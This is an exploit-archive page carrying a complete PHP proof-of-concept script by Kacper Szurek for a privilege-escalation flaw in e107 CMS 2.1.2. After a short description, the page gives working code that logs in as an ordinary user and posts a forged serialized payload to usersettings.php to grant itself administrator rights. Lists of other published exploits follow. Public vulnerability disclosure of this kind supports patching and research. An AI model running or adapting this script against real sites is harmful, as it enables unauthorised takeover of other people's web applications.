Menu

Search for hundreds of thousands of exploits

"e107 CMS 2.1.2 - Privilege Escalation"

Author

Exploit author

"Kacper Szurek"

Platform

Exploit platform

php

Release date

Exploit published date

2016-11-09

Download file

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
# Exploit Title: e107 CMS 2.1.2 Privilege Escalation
# Date: 09-11-2016
# Software Link: http://e107.org/
# Exploit Author: Kacper Szurek
# Contact: http://twitter.com/KacperSzurek
# Website: http://security.szurek.pl/
# Category: webapps
 
1. Description

Datas from `$_POST['updated_data']` inside `usersettings.php` are not properly validated so we can set `user_admin`.

http://security.szurek.pl/e107-cms-211-privilege-escalation.html

2. Proof of Concept

<?php

/**
 * e107 CMS 2.1.2 Privilege Escalation
 * Kacper Szurek
 * http://security.szurek.pl
 */
function hack($url, $login, $pass, $cookie){

	$ckfile = dirname(__FILE__) . $cookie;
	$cookie = fopen($ckfile, 'w') or die("Cannot create cookie file");

	$ch = curl_init();
	curl_setopt($ch, CURLOPT_URL, $url);
	curl_setopt($ch, CURLOPT_COOKIEJAR, $cookie);
	curl_setopt($ch, CURLOPT_TIMEOUT, 10);
	curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
	curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
	curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query(array('username' => $login, 'userpass' => $pass, 'userlogin' => 'Sign In')));
	curl_setopt($ch, CURLOPT_POST, 1);
	$content = curl_exec($ch);
	if (strpos($content, '?logout') === false) {
		die("Cannot login");
	}

	$data = array();
	$data['user_admin'] = 1;
	$data['user_perms'] = 0;
	$data['user_password'] = md5($pass);

	curl_setopt($ch, CURLOPT_URL, $url.'/usersettings.php');
	curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query(array('SaveValidatedInfo' => 1, 'updated_data' => base64_encode(serialize($data)), 'updated_key' => md5(serialize($data)), 'currentpassword' => $pass)));
	$content = curl_exec($ch);

	if (strpos($content, 'Settings updated') === false) {
		die("Exploit probably failed");
	}

	die('OK!');
}

$url = "http://url_here";

// Standard user credentials 
$user = "login_here";
$pass = "password_here";

$cookie = "/cookie.txt";
hack($url, $user, $pass, $cookie);
Release Date Title Type Platform Author
2020-12-02 "aSc TimeTables 2021.6.2 - Denial of Service (PoC)" local windows "Ismael Nava"
2020-12-02 "Anuko Time Tracker 1.19.23.5311 - No rate Limit on Password Reset functionality" webapps php "Mufaddal Masalawala"
2020-12-02 "Ksix Zigbee Devices - Playback Protection Bypass (PoC)" remote multiple "Alejandro Vazquez Vazquez"
2020-12-02 "Mitel mitel-cs018 - Call Data Information Disclosure" remote linux "Andrea Intilangelo"
2020-12-02 "Artworks Gallery 1.0 - Arbitrary File Upload RCE (Authenticated) via Edit Profile" webapps multiple "Shahrukh Iqbal Mirza"
2020-12-02 "DotCMS 20.11 - Stored Cross-Site Scripting" webapps multiple "Hardik Solanki"
2020-12-02 "ChurchCRM 4.2.0 - CSV/Formula Injection" webapps multiple "Mufaddal Masalawala"
2020-12-02 "ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)" webapps multiple "Mufaddal Masalawala"
2020-12-02 "NewsLister - Authenticated Persistent Cross-Site Scripting" webapps multiple "Emre Aslan"
2020-12-02 "IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path" local windows "Manuel Alvarez"
Release Date Title Type Platform Author
2020-12-02 "WonderCMS 3.1.3 - 'Menu' Persistent Cross-Site Scripting" webapps php "Hemant Patidar"
2020-12-02 "WordPress Plugin Wp-FileManager 6.8 - RCE" webapps php "Mansoor R"
2020-12-02 "WonderCMS 3.1.3 - Authenticated SSRF to Remote Remote Code Execution" webapps php zetc0de
2020-12-02 "Anuko Time Tracker 1.19.23.5311 - Password Reset leading to Account Takeover" webapps php "Mufaddal Masalawala"
2020-12-02 "Simple College Website 1.0 - 'page' Local File Inclusion" webapps php Mosaaed
2020-12-02 "Car Rental Management System 1.0 - SQL Injection / Local File include" webapps php Mosaaed
2020-12-02 "Pharmacy Store Management System 1.0 - 'id' SQL Injection" webapps php "Aydın Baran Ertemir"
2020-12-02 "Anuko Time Tracker 1.19.23.5311 - No rate Limit on Password Reset functionality" webapps php "Mufaddal Masalawala"
2020-12-02 "WonderCMS 3.1.3 - Authenticated Remote Code Execution" webapps php zetc0de
2020-12-01 "Multi Restaurant Table Reservation System 1.0 - Multiple Persistent XSS" webapps php yunaranyancat
Release Date Title Type Platform Author
2018-07-18 "HomeMatic Zentrale CCU2 - Remote Code Execution" remote hardware "Kacper Szurek"
2018-07-04 "Gitea 1.4.0 - Remote Code Execution" webapps multiple "Kacper Szurek"
2018-07-04 "ManageEngine Exchange Reporter Plus < Build 5311 - Remote Code Execution" webapps java "Kacper Szurek"
2018-05-21 "GitBucket 4.23.1 - Remote Code Execution" webapps java "Kacper Szurek"
2018-04-26 "GitList 0.6 - Remote Code Execution" webapps php "Kacper Szurek"
2018-01-18 "GitStack 2.3.10 - Remote Code Execution" webapps php "Kacper Szurek"
2017-09-27 "NETGEAR ReadyNAS Surveillance 1.4.3-16 - Remote Command Execution" webapps hardware "Kacper Szurek"
2017-08-08 "Synology Photo Station 6.7.3-3432 / 6.3-2967 - Remote Code Execution" webapps hardware "Kacper Szurek"
2017-07-24 "ManageEngine Desktop Central 10 Build 100087 - Remote Code Execution (Metasploit)" webapps java "Kacper Szurek"
2017-05-10 "QNAP PhotoStation 5.2.4 / MusicStation 4.8.4 - Authentication Bypass" webapps php "Kacper Szurek"
2017-04-25 "Dell Customer Connect 1.3.28.0 - Local Privilege Escalation" local windows "Kacper Szurek"
2017-03-06 "CyberGhost 6.0.4.2205 - Local Privilege Escalation" local windows "Kacper Szurek"
2017-02-14 "ShadeYouVPN Client 2.0.1.11 - Local Privilege Escalation" local windows "Kacper Szurek"
2017-02-06 "IVPN Client 2.6.1 - Local Privilege Escalation" local windows "Kacper Szurek"
2017-01-31 "Viscosity 1.6.7 - Local Privilege Escalation" local windows "Kacper Szurek"
2017-01-24 "WD My Cloud Mirror 2.11.153 - Authentication Bypass / Remote Code Execution" webapps hardware "Kacper Szurek"
2017-01-18 "SentryHD 02.01.12e - Local Privilege Escalation" local windows "Kacper Szurek"
2017-01-10 "WordPress Plugin WP Support Plus Responsive Ticket System 7.1.3 - Privilege Escalation" webapps php "Kacper Szurek"
2016-12-06 "AbanteCart 1.2.7 - Cross-Site Scripting" webapps php "Kacper Szurek"
2016-11-29 "WinPower 4.9.0.4 - Local Privilege Escalation" local windows "Kacper Szurek"
2016-11-09 "e107 CMS 2.1.2 - Privilege Escalation" webapps php "Kacper Szurek"
2016-09-20 "Dolphin 7.3.0 - Error-Based SQL Injection" webapps php "Kacper Szurek"
2016-07-11 "Tiki Wiki CMS 15.0 - Arbitrary File Download" webapps php "Kacper Szurek"
2016-06-10 "phpMyFAQ 2.9.0 - Persistent Cross-Site Scripting" webapps php "Kacper Szurek"
2016-06-06 "WordPress Plugin Double Opt-In for Download 2.0.9 - SQL Injection" webapps php "Kacper Szurek"
2016-02-15 "Tiny Tiny RSS - Blind SQL Injection" webapps php "Kacper Szurek"
2015-12-30 "WordPress Plugin Simple Ads Manager 2.9.4.116 - SQL Injection" webapps php "Kacper Szurek"
2015-12-14 "WordPress Plugin Admin Management Xtended 2.4.0 - Privilege escalation" webapps php "Kacper Szurek"
2015-11-11 "WordPress Plugin WP Fastest Cache 0.8.4.8 - Blind SQL Injection" webapps php "Kacper Szurek"
2015-08-09 "WordPress Plugin Video Gallery 2.7 - SQL Injection" webapps php "Kacper Szurek" 
import requests
response = requests.get('http://127.0.0.1:8181?format=json')

For full documentation follow the link above

Cipherscan. Find out which SSL ciphersuites are supported by a target.

Cipher Protocols Sigalg Trusted

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.

Host WAF detected